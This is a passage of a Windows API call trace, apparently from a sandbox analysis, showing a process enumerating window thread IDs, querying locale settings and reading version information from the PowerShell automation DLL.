	[0947.873] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x10ac
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x10ec
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1068
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x17e0
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x102c
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x17a4
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1050
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1694
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1770
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1720
	[0947.873] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x165c
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1578
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x16c0
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x161c
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1638
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x15c8
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1554
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1674
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1520
	[0947.874] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x14bc
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xf8c
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe9c
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1434
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x14ec
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xfcc
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x12ac
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1484
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x934
	[0947.875] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc0c
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xb08
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x948
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1178
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x13e0
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xcd0
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x13fc
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xdc8
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc18
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc2c
	[0947.876] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa1c
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1244
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xdb0
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1398
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1358
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1370
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1340
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x130c
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x12c0
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x12e4
	[0947.877] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1270
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1298
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x120c
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x122c
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x11c4
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x11b0
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1188
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1148
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1160
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x10fc
	[0947.878] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe34
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xea4
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x514
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe48
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xbc8
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xdf8
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x318
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xcac
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x8bc
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xf9c
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xf48
	[0947.879] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe40
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xecc
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xeb8
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe80
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe98
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe60
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xee4
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xf00
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xdf0
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xe1c
	[0947.880] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xdd0
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xd94
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xd74
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xd00
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xcd8
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc84
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xca4
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc64
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xc24
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xb84
	[0947.881] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xbac
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x384
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xab8
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x33c
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa44
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa64
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x8a8
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xaf0
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x88c
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xb04
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x910
	[0947.882] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x230
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xac0
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xab4
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xaac
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x3d0
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x978
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa7c
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x59c
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa88
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa6c
	[0947.883] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa68
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x9f8
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xa04
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x924
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x8dc
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x7dc
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x768
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x764
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x820
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x810
	[0947.884] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x794
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x83c
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x7ac
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xb44
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x6bc
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0xb5c
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x838
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.885] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x4d0
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x818
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x5b8
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x494
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x1ec
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x440
	[0947.886] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x7e8
	[0947.887] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x730
	[0947.887] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x2c8
	[0947.887] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ad8c0 | out: lpdwProcessId=0x1ad8c0) returned 0x31c
	[0947.891] WerSetFlags () returned 0x0
	[0948.612] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0948.612] CoTaskMemFree (pv=0x0) 
	[0948.613] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adc28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adc20 | out: pulNumLanguages=0x1adc28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1adc20) returned 1
	[0948.613] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1adc28, pwszLanguagesBuffer=0x2cdf538, pcchLanguagesBuffer=0x1adc20 | out: pulNumLanguages=0x1adc28, pwszLanguagesBuffer=0x2cdf538, pcchLanguagesBuffer=0x1adc20) returned 1
	[0948.619] CoTaskMemAlloc (cb=0x24) returned 0x36ceb0
	[0948.619] GetUserDefaultLocaleName (in: lpLocaleName=0x36ceb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0948.619] CoTaskMemFree (pv=0x36ceb0) 
	[0951.065] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0951.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.065] CoTaskMemFree (pv=0x3597b0) 
	[0951.067] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0951.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.067] CoTaskMemFree (pv=0x3597b0) 
	[0951.068] CoTaskMemAlloc (cb=0x104) returned 0x3597b0
	[0951.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3597b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.068] CoTaskMemFree (pv=0x3597b0) 
	[0951.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.077] SetErrorMode (uMode=0x1) returned 0x1
	[0951.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad8a0 | out: lpFileInformation=0x1ad8a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0951.078] SetErrorMode (uMode=0x1) returned 0x1
	[0951.078] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adb10 | out: lpdwHandle=0x1adb10) returned 0x94c
	[0951.079] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce2dc8 | out: lpData=0x2ce2dc8) returned 1
	[0951.080] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ada88, puLen=0x1ada80 | out: lplpBuffer=0x1ada88*=0x2ce2e64, puLen=0x1ada80) returned 1
	[0951.080] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce2f40, puLen=0x1ad9f0) returned 1
	[0951.080] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0951.080] CoTaskMemAlloc (cb=0x2e) returned 0x367bf0
	[0951.080] lstrcpyW (in: lpString1=0x367bf0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0951.080] CoTaskMemFree (pv=0x367bf0) 
	[0951.080] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce2f94, puLen=0x1ad9f0) returned 1
	[0951.080] lstrlenW (lpString="System.Management.Automation") returned 28
	[0951.080] CoTaskMemAlloc (cb=0x3c) returned 0x2e8210
	[0951.080] lstrcpyW (in: lpString1=0x2e8210, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0951.080] CoTaskMemFree (pv=0x2e8210) 
	[0951.080] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce2ff0, puLen=0x1ad9f0) returned 1
	[0951.080] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.080] CoTaskMemAlloc (cb=0x20) returned 0x36cf10
	[0951.080] lstrcpyW (in: lpString1=0x36cf10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.080] CoTaskMemFree (pv=0x36cf10) 
	[0951.080] VerQueryValueW (in: pBlock=0x2ce2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2ce3030, puLen=0x1ad9f0) returned 1
	[0951.080] lstrlenW (lpString="System.Management.Automation.dll") returned 32
